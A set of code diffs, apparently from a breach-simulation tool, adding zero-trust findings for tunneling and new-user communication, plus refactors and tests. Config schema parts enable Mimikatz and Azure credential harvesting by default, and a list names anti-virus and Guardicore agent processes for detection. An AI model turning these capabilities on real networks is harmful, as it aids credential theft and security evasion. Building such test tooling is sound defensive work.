events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)]
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 0)
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)
|
||||
|
||||
def test_create_or_add_to_existing_2_tests_already_exist(self):
|
||||
self.fail_if_not_testing_env()
|
||||
self.clean_finding_db()
|
||||
|
||||
test = TEST_MALICIOUS_ACTIVITY_TIMELINE
|
||||
status = STATUS_VERIFY
|
||||
event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)
|
||||
events = [event]
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 0)
|
||||
|
||||
Finding.save_finding(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)
|
||||
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)
|
||||
|
||||
Finding.save_finding(test, status, events)
|
||||
|
||||
self.assertEquals(len(Finding.objects(test=test, status=status)), 2)
|
||||
|
||||
with self.assertRaises(AssertionError):
|
||||
AggregateFinding.create_or_add_to_existing(test, status, events)
|
|
@@ -14,7 +14,7 @@ REPORT_TYPES = [SECURITY_REPORT_TYPE, ZERO_TRUST_REPORT_TYPE]

REPORT_DATA_PILLARS = "pillars"
REPORT_DATA_FINDINGS = "findings"
REPORT_DATA_RECOMMENDATIONS_STATUS = "recommendations"
REPORT_DATA_PRINCIPLES_STATUS = "principles"

__author__ = ["itay.mizeretz", "shay.nehmad"]

@@ -33,8 +33,8 @@ class Report(flask_restful.Resource):
                    "grades": ZeroTrustService.get_pillars_grades()
                }
            )
        elif report_data == REPORT_DATA_RECOMMENDATIONS_STATUS:
            return jsonify(ZeroTrustService.get_recommendations_status())
        elif report_data == REPORT_DATA_PRINCIPLES_STATUS:
            return jsonify(ZeroTrustService.get_principles_status())
        elif report_data == REPORT_DATA_FINDINGS:
            return jsonify(ZeroTrustService.get_all_findings())
@ -111,6 +111,14 @@ SCHEMA = {
|
|||
"title": "Back door user",
|
||||
"attack_techniques": []
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"CommunicateAsNewUser"
|
||||
],
|
||||
"title": "Communicate as new user",
|
||||
"attack_techniques": []
|
||||
},
|
||||
],
|
||||
},
|
||||
"finger_classes": {
|
||||
|
@ -329,6 +337,7 @@ SCHEMA = {
|
|||
"$ref": "#/definitions/post_breach_acts"
|
||||
},
|
||||
"default": [
|
||||
"CommunicateAsNewUser"
|
||||
],
|
||||
"description": "List of actions the Monkey will run post breach"
|
||||
},
|
||||
|
@ -406,7 +415,7 @@ SCHEMA = {
|
|||
"title": "Harvest Azure Credentials",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"attack_techniques": ["T1003", "T1078"],
|
||||
"attack_techniques": ["T1003"],
|
||||
"description":
|
||||
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
|
||||
},
|
||||
|
@ -421,7 +430,7 @@ SCHEMA = {
|
|||
"title": "Should use Mimikatz",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"attack_techniques": ["T1003", "T1078"],
|
||||
"attack_techniques": ["T1003"],
|
||||
"description": "Determines whether to use Mimikatz"
|
||||
},
|
||||
}
|
||||
|
|
|
@ -7,7 +7,7 @@ from botocore.exceptions import UnknownServiceError
|
|||
|
||||
from common.cloud.aws_instance import AwsInstance
|
||||
from monkey_island.cc.environment.environment import load_server_configuration_from_file
|
||||
from monkey_island.cc.resources.exporter import Exporter
|
||||
from monkey_island.cc.services.reporting.exporter import Exporter
|
||||
|
||||
__authors__ = ['maor.rayzin', 'shay.nehmad']
|
||||
|
|
@ -1,16 +1,16 @@
|
|||
import logging
|
||||
|
||||
from monkey_island.cc.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.resources.aws_exporter import AWSExporter
|
||||
from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.services.reporting.aws_exporter import AWSExporter
|
||||
from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
|
||||
|
||||
from monkey_island.cc.environment.environment import env
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def populate_exporter_list():
|
||||
manager = ReportExporterManager()
|
||||
RemoteRunAwsService.init()
|
||||
if RemoteRunAwsService.is_running_on_aws():
|
||||
if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
|
||||
manager.add_exporter_to_list(AWSExporter)
|
||||
|
||||
if len(manager.get_exporters_list()) != 0:
|
|
@ -12,7 +12,7 @@ from six import text_type
|
|||
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
|
||||
from monkey_island.cc.database import mongo
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.services.config import ConfigService
|
||||
from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups
|
||||
from monkey_island.cc.services.edge import EdgeService
|
||||
|
|
|
@ -27,9 +27,9 @@ class ReportExporterManager(object):
|
|||
self._exporters_set.add(exporter)
|
||||
|
||||
def export(self, report):
|
||||
try:
|
||||
for exporter in self._exporters_set:
|
||||
logger.debug("Trying to export using " + repr(exporter))
|
||||
for exporter in self._exporters_set:
|
||||
logger.debug("Trying to export using " + repr(exporter))
|
||||
try:
|
||||
exporter().handle_report(report)
|
||||
except Exception as e:
|
||||
logger.exception('Failed to export report, error: ' + e.message)
|
||||
except Exception as e:
|
||||
logger.exception('Failed to export report, error: ' + e.message)
|
|
@ -11,12 +11,12 @@ def save_example_findings():
|
|||
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2
|
||||
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1
|
||||
# devices unexecuted = 1
|
||||
# people inconclusive = 1
|
||||
# networks inconclusive = 1
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_INCONCLUSIVE, [])
|
||||
# people inconclusive = 2
|
||||
# networks inconclusive = 2
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_INCONCLUSIVE, [])
|
||||
# people verify = 1
|
||||
# networks verify = 1
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||
# people verify = 2
|
||||
# networks verify = 2
|
||||
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||
# data failed 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||
# data failed 2
|
||||
|
@ -27,10 +27,10 @@ def save_example_findings():
|
|||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||
# data failed 5
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||
# data inconclusive 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_INCONCLUSIVE, [])
|
||||
# data inconclusive 2
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_INCONCLUSIVE, [])
|
||||
# data verify 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||
# data verify 2
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||
# data passed 1
|
||||
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, [])
|
||||
|
||||
|
@ -45,49 +45,49 @@ class TestZeroTrustService(IslandTestCase):
|
|||
expected = [
|
||||
{
|
||||
STATUS_FAILED: 5,
|
||||
STATUS_INCONCLUSIVE: 2,
|
||||
STATUS_VERIFY: 2,
|
||||
STATUS_PASSED: 1,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
"pillar": "Data"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 2,
|
||||
STATUS_VERIFY: 2,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
"pillar": "People"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 2,
|
||||
STATUS_VERIFY: 2,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 2,
|
||||
STATUS_UNEXECUTED: 4,
|
||||
"pillar": "Networks"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 1,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 2,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
"pillar": "Devices"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0,
|
||||
"pillar": "Workloads"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 1,
|
||||
STATUS_UNEXECUTED: 3,
|
||||
"pillar": "Visibility & Analytics"
|
||||
},
|
||||
{
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0,
|
||||
"pillar": "Automation & Orchestration"
|
||||
|
@ -98,49 +98,51 @@ class TestZeroTrustService(IslandTestCase):
|
|||
|
||||
self.assertEquals(result, expected)
|
||||
|
||||
def test_get_recommendations_status(self):
|
||||
def test_get_principles_status(self):
|
||||
self.fail_if_not_testing_env()
|
||||
self.clean_finding_db()
|
||||
|
||||
self.maxDiff = None
|
||||
|
||||
save_example_findings()
|
||||
|
||||
expected = {
|
||||
AUTOMATION_ORCHESTRATION: [],
|
||||
DATA: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_DATA_TRANSIT],
|
||||
"principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT],
|
||||
"status": STATUS_FAILED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_FAILED,
|
||||
"test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_FAILED,
|
||||
"test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
DEVICES: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_ENDPOINT_SECURITY],
|
||||
"principle": PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY],
|
||||
"status": STATUS_FAILED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_FAILED,
|
||||
"test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY]
|
||||
},
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
NETWORKS: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_SEGMENTATION],
|
||||
"principle": PRINCIPLES[PRINCIPLE_SEGMENTATION],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
|
@ -150,17 +152,27 @@ class TestZeroTrustService(IslandTestCase):
|
|||
]
|
||||
},
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_USER_BEHAVIOUR],
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||
"status": STATUS_VERIFY,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"status": STATUS_VERIFY,
|
||||
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC],
|
||||
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
|
@ -168,23 +180,53 @@ class TestZeroTrustService(IslandTestCase):
|
|||
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
],
|
||||
PEOPLE: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_USER_BEHAVIOUR],
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||
"status": STATUS_VERIFY,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_INCONCLUSIVE,
|
||||
"status": STATUS_VERIFY,
|
||||
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
"Visibility & Analytics": [
|
||||
VISIBILITY_ANALYTICS: [
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC],
|
||||
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
|
@ -192,12 +234,23 @@ class TestZeroTrustService(IslandTestCase):
|
|||
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
{
|
||||
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"tests": [
|
||||
{
|
||||
"status": STATUS_UNEXECUTED,
|
||||
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||
}
|
||||
]
|
||||
},
|
||||
],
|
||||
"Workloads": []
|
||||
WORKLOADS: []
|
||||
}
|
||||
|
||||
self.assertEquals(ZeroTrustService.get_recommendations_status(), expected)
|
||||
result = ZeroTrustService.get_principles_status()
|
||||
self.assertEquals(result, expected)
|
||||
|
||||
def test_get_pillars_to_statuses(self):
|
||||
self.fail_if_not_testing_env()
|
||||
|
@ -222,8 +275,8 @@ class TestZeroTrustService(IslandTestCase):
|
|||
expected = {
|
||||
AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED,
|
||||
DEVICES: STATUS_FAILED,
|
||||
NETWORKS: STATUS_INCONCLUSIVE,
|
||||
PEOPLE: STATUS_INCONCLUSIVE,
|
||||
NETWORKS: STATUS_VERIFY,
|
||||
PEOPLE: STATUS_VERIFY,
|
||||
VISIBILITY_ANALYTICS: STATUS_UNEXECUTED,
|
||||
WORKLOADS: STATUS_UNEXECUTED,
|
||||
DATA: STATUS_FAILED
|
||||
|
|
|
@ -17,7 +17,7 @@ class ZeroTrustService(object):
|
|||
pillar_grade = {
|
||||
"pillar": pillar,
|
||||
STATUS_FAILED: 0,
|
||||
STATUS_INCONCLUSIVE: 0,
|
||||
STATUS_VERIFY: 0,
|
||||
STATUS_PASSED: 0,
|
||||
STATUS_UNEXECUTED: 0
|
||||
}
|
||||
|
@ -39,30 +39,30 @@ class ZeroTrustService(object):
|
|||
return pillar_grade
|
||||
|
||||
@staticmethod
|
||||
def get_recommendations_status():
|
||||
all_recommendations_statuses = {}
|
||||
def get_principles_status():
|
||||
all_principles_statuses = {}
|
||||
|
||||
# init with empty lists
|
||||
for pillar in PILLARS:
|
||||
all_recommendations_statuses[pillar] = []
|
||||
all_principles_statuses[pillar] = []
|
||||
|
||||
for recommendation, recommendation_tests in RECOMMENDATIONS_TO_TESTS.items():
|
||||
for pillar in RECOMMENDATIONS_TO_PILLARS[recommendation]:
|
||||
all_recommendations_statuses[pillar].append(
|
||||
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||
for pillar in PRINCIPLES_TO_PILLARS[principle]:
|
||||
all_principles_statuses[pillar].append(
|
||||
{
|
||||
"recommendation": RECOMMENDATIONS[recommendation],
|
||||
"tests": ZeroTrustService.__get_tests_status(recommendation_tests),
|
||||
"status": ZeroTrustService.__get_recommendation_status(recommendation_tests)
|
||||
"principle": PRINCIPLES[principle],
|
||||
"tests": ZeroTrustService.__get_tests_status(principle_tests),
|
||||
"status": ZeroTrustService.__get_principle_status(principle_tests)
|
||||
}
|
||||
)
|
||||
|
||||
return all_recommendations_statuses
|
||||
return all_principles_statuses
|
||||
|
||||
@staticmethod
|
||||
def __get_recommendation_status(recommendation_tests):
|
||||
def __get_principle_status(principle_tests):
|
||||
worst_status = STATUS_UNEXECUTED
|
||||
all_statuses = set()
|
||||
for test in recommendation_tests:
|
||||
for test in principle_tests:
|
||||
all_statuses |= set(Finding.objects(test=test).distinct("status"))
|
||||
|
||||
for status in all_statuses:
|
||||
|
@ -72,9 +72,9 @@ class ZeroTrustService(object):
|
|||
return worst_status
|
||||
|
||||
@staticmethod
|
||||
def __get_tests_status(recommendation_tests):
|
||||
def __get_tests_status(principle_tests):
|
||||
results = []
|
||||
for test in recommendation_tests:
|
||||
for test in principle_tests:
|
||||
test_findings = Finding.objects(test=test)
|
||||
results.append(
|
||||
{
|
||||
|
@ -124,7 +124,7 @@ class ZeroTrustService(object):
|
|||
def get_statuses_to_pillars():
|
||||
results = {
|
||||
STATUS_FAILED: [],
|
||||
STATUS_INCONCLUSIVE: [],
|
||||
STATUS_VERIFY: [],
|
||||
STATUS_PASSED: [],
|
||||
STATUS_UNEXECUTED: []
|
||||
}
|
||||
|
|
|
@@ -1,7 +1,27 @@
from monkey_island.cc.database import mongo
from common.data.post_breach_consts import *
from monkey_island.cc.models import Monkey
from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication


def process_communicate_as_new_user_telemetry(telemetry_json):
    current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
    message = telemetry_json['data']['result'][0]
    success = telemetry_json['data']['result'][1]
    test_new_user_communication(current_monkey, success, message)


POST_BREACH_TELEMETRY_PROCESSING_FUNCS = {
    POST_BREACH_COMMUNICATE_AS_NEW_USER: process_communicate_as_new_user_telemetry,
}


def process_post_breach_telemetry(telemetry_json):
    mongo.db.monkey.update(
        {'guid': telemetry_json['monkey_guid']},
        {'$push': {'pba_results': telemetry_json['data']}})

    post_breach_action_name = telemetry_json["data"]["name"]
    if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS:
        POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json)
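For illustration, a post-breach telemetry payload that would be routed to the new handler might look like this; the field values are made up, but the structure follows the dictionary accesses in the code above:

    telemetry_json = {
        "monkey_guid": "1234567890",
        "data": {
            "name": POST_BREACH_COMMUNICATE_AS_NEW_USER,
            "result": ["Created process 'PING.exe ...' as user 'somenewuserabcde', and successfully pinged.", True],
        },
    }
    # Stores the PBA result on the monkey document and dispatches the zero-trust test.
    process_post_breach_telemetry(telemetry_json)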
@@ -1,10 +1,13 @@
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field
from monkey_island.cc.services.telemetry.zero_trust_tests.tunneling import test_tunneling_violation


def process_tunnel_telemetry(telemetry_json):
    test_tunneling_violation(telemetry_json)
    monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"]
    if telemetry_json['data']['proxy'] is not None:
        tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
        tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(telemetry_json)
        NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip)
    else:
        NodeService.unset_all_monkey_tunnels(monkey_id)

@@ -11,3 +11,8 @@ def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
    dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)

    return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])


def get_tunnel_host_ip_from_proxy_field(telemetry_json):
    tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
    return tunnel_host_ip
@@ -3,8 +3,8 @@ import json

from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \
    STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.models.zero_trust.finding import Finding
from monkey_island.cc.services.telemetry.zero_trust_tests.known_anti_viruses import ANTI_VIRUS_KNOWN_PROCESS_NAMES

@@ -31,7 +31,9 @@ def test_antivirus_existence(telemetry_json):
        test_status = STATUS_PASSED
    else:
        test_status = STATUS_FAILED
    Finding.save_finding(test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events)
    AggregateFinding.create_or_add_to_existing(
        test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events
    )


def filter_av_processes(telemetry_json):
@@ -0,0 +1,37 @@
from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \
    STATUS_PASSED
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
from monkey_island.cc.models.zero_trust.event import Event

COMM_AS_NEW_USER_FAILED_FORMAT = "Monkey on {} couldn't communicate as new user. Details: {}"
COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \
    "New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}"


def test_new_user_communication(current_monkey, success, message):
    AggregateFinding.create_or_add_to_existing(
        test=TEST_COMMUNICATE_AS_NEW_USER,
        # If the monkey succeeded to create a user, then the test failed.
        status=STATUS_FAILED if success else STATUS_PASSED,
        events=[
            get_attempt_event(current_monkey),
            get_result_event(current_monkey, message, success)
        ]
    )


def get_attempt_event(current_monkey):
    tried_to_communicate_event = Event.create_event(
        title="Communicate as new user",
        message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname),
        event_type=EVENT_TYPE_MONKEY_NETWORK)
    return tried_to_communicate_event


def get_result_event(current_monkey, message, success):
    message_format = COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT

    return Event.create_event(
        title="Communicate as new user",
        message=message_format.format(current_monkey.hostname, message),
        event_type=EVENT_TYPE_MONKEY_NETWORK)
@@ -3,8 +3,8 @@ import json
from common.data.network_consts import ES_SERVICE
from common.data.zero_trust_consts import *
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.models.zero_trust.finding import Finding

HTTP_SERVERS_SERVICES_NAMES = ['tcp-80']

@@ -55,20 +55,16 @@ def test_open_data_endpoints(telemetry_json):
            event_type=EVENT_TYPE_MONKEY_NETWORK
        ))

    Finding.save_finding(
    AggregateFinding.create_or_add_to_existing(
        test=TEST_DATA_ENDPOINT_HTTP,
        status=found_http_server_status,
        events=events
    )

    Finding.save_finding(
    AggregateFinding.create_or_add_to_existing(
        test=TEST_DATA_ENDPOINT_ELASTIC,
        status=found_elastic_search_server,
        events=events
    )

    Finding.save_finding(
        test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
        status=STATUS_INCONCLUSIVE,
        events=events
    )
    add_malicious_activity_to_timeline(events)
@@ -65,5 +65,23 @@ ANTI_VIRUS_KNOWN_PROCESS_NAMES = [
    u"DWHWizrd.exe",
    u"RtvStart.exe",
    u"roru.exe",
    u"WSCSAvNotifier"
    u"WSCSAvNotifier",
    # Guardicore Centra
    # Linux
    u"gc-agents-service",
    u"gc-guest-agent",
    u"gc-guardig",
    u"gc-digger",
    u"gc-fastpath",
    u"gc-enforcement-agent",
    u"gc-enforcement-channel",
    u"gc-detection-agent",
    # Windows
    u"gc-guest-agent.exe",
    u"gc-windig.exe",
    u"gc-digger.exe",
    u"gc-fastpath.exe",
    u"gc-enforcement-channel.exe",
    u"gc-enforcement-agent.exe",
    u"gc-agent-ui.exe"
]
@@ -1,6 +1,7 @@
from common.data.zero_trust_consts import *
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.models.zero_trust.finding import Finding


def test_machine_exploited(current_monkey, exploit_successful, exploiter, target_ip, timestamp):

@@ -28,13 +29,11 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target
                timestamp=timestamp)
        )
        status = STATUS_FAILED
    Finding.save_finding(

    AggregateFinding.create_or_add_to_existing(
        test=TEST_MACHINE_EXPLOITED,
        status=status,
        events=events
    )
    Finding.save_finding(
        test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
        status=STATUS_INCONCLUSIVE,
        events=events
    )

    add_malicious_activity_to_timeline(events)
@@ -0,0 +1,27 @@
from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK
from monkey_island.cc.models import Monkey
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field


def test_tunneling_violation(tunnel_telemetry_json):
    if tunnel_telemetry_json['data']['proxy'] is not None:
        # Monkey is tunneling, create findings
        tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(tunnel_telemetry_json)
        current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json['monkey_guid'])
        tunneling_events = [Event.create_event(
            title="Tunneling event",
            message="Monkey on {hostname} tunneled traffic through {proxy}.".format(
                hostname=current_monkey.hostname, proxy=tunnel_host_ip),
            event_type=EVENT_TYPE_MONKEY_NETWORK,
            timestamp=tunnel_telemetry_json['timestamp']
        )]

        AggregateFinding.create_or_add_to_existing(
            test=TEST_TUNNELING,
            status=STATUS_FAILED,
            events=tunneling_events
        )

        add_malicious_activity_to_timeline(tunneling_events)
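For context, a tunnel telemetry document that would trigger this finding might look roughly like the sample below; only the keys actually read by test_tunneling_violation are shown, and all values are illustrative.

# Illustrative payload only -- field values are made up.
sample_tunnel_telemetry = {
    'monkey_guid': '211375648895908',
    'timestamp': '2019-08-01T12:00:00.000Z',
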